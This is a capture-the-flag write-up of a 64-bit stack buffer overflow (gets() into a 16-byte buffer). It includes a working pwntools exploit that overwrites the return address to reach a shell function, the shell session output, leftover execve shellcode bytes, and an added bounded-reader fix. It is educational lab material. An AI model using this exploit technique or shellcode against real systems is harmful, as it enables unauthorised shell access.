# (solved) pwn/coffer-overflow-2

You'll have to jump to a function now!?

nc 2020.redpwnc.tf 31908

```
https://redpwn.storage.googleapis.com/uploads/3300eb3f45e5ba0d0fe0d43d64d26d5deac9171cd85f986dd28dc3d07edb8c70/coffer-overflow-2.c
https://redpwn.storage.googleapis.com/uploads/336d9543aa8f844cf2aa918631094bb01f97e86b75fd7dc30cf822246e2873a2/coffer-overflow-2
```

```c
#include <stdio.h>
#include <string.h>

int main(void)
{
  char name[16];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)");
  puts("What do you want to fill your coffer with?");

  gets(name);
}

void binFunction() {
  system("/bin/sh");
}
```

The address of `binFunction()` is `00000000004006e6`:

```
objdump -D -M intel coffer-overflow-2|grep binFunction
00000000004006e6 <binFunction>:
```

Exploit script. `gets()` does not bound the write into the 16-byte `name` buffer, so 24 bytes of padding (the 16-byte buffer plus the 8-byte saved RBP) reach the saved return address, which is then overwritten with the little-endian address of `binFunction()`:

```python
#!/usr/bin/python3
from time import sleep
from pwn import *

# Leftover shellcode bytes; not used by this exploit, which returns into binFunction() instead
shell = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

r = remote('2020.redpwnc.tf', 31908)
#r = process('./coffer-overflow-2')

# Read the banner and the prompt
print(r.recvline())
print(r.recvuntil(b'What do you want to fill your coffer with?'))

# 24 bytes of padding, then the address of binFunction() (0x4006e6) in little-endian order
r.sendline(b"B"*24 + b"\xe6\x06\x40\x00\x00\x00\x00\x00")
r.interactive()
```

Output:

```bash
# ./doit.py
[+] Opening connection to 2020.redpwnc.tf on port 31908: Done
b'Welcome to coffer overflow, where our coffers are overfilling with bytes ;)\n'
b'What do you want to fill your coffer with?'
[*] Switching to interactive mode
$ ls
Makefile
bin
coffer-overflow-2
coffer-overflow-2.c
dev
flag.txt
lib
lib32
lib64
$ cat flag.txt
flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n}
$
```
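
The root cause is the unbounded `gets(name)` in the challenge source. The block below is an added example, not part of the original writeup or the challenge files: a bounded reader that could replace that call, replayed against the same 32-byte line the exploit sends. The names `read_name`, `payload_stays_in_bounds`, the return codes and the guard value are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define NAME_SIZE 16 /* same size as name[] in coffer-overflow-2.c */
#define GUARD 0xAAAAAAAAAAAAAAAAULL /* constructed marker placed after the buffer */
enum { NAME_OK = 0, NAME_TRUNCATED = 1, NAME_EOF = -1 }; /* example's own codes */

/* Bounded replacement for gets(): stores at most size-1 bytes of one line,
 * always NUL-terminates, and discards the rest of an over-long line. */
int read_name(FILE *in, char *buf, size_t size)
{
    size_t n = 0;
    int c, truncated = 0;
    if (size == 0) return NAME_EOF;
    while ((c = getc(in)) != EOF && c != '\n') {
        if (n + 1 < size)
            buf[n++] = (char)c;
        else
            truncated = 1; /* byte would not fit: drop it */
    }
    buf[n] = '\0';
    if (c == EOF && n == 0 && !truncated)
        return NAME_EOF;
    return truncated ? NAME_TRUNCATED : NAME_OK;
}

/* Constructed check: replay the writeup's 32-byte line (24 filler bytes plus
 * the 8 address bytes) and confirm the bytes after the buffer are untouched. */
int payload_stays_in_bounds(void)
{
    static const unsigned char addr[8] = { 0xe6, 0x06, 0x40, 0, 0, 0, 0, 0 };
    struct { char name[NAME_SIZE]; unsigned long long guard; } f;
    FILE *in = tmpfile();
    int rc, i;
    if (in == NULL) return -1;
    for (i = 0; i < 24; i++)
        putc('B', in);
    fwrite(addr, 1, sizeof addr, in);
    putc('\n', in);
    rewind(in);
    f.guard = GUARD;
    rc = read_name(in, f.name, sizeof f.name);
    fclose(in);
    return rc == NAME_TRUNCATED && strlen(f.name) == (size_t)(NAME_SIZE - 1)
        && f.guard == GUARD;
}

int main(void)
{
    printf("payload contained: %d\n", payload_stays_in_bounds());
}
```

With this reader only 15 bytes of the line are stored and the saved return address is never reached, so the jump to `binFunction()` does not happen.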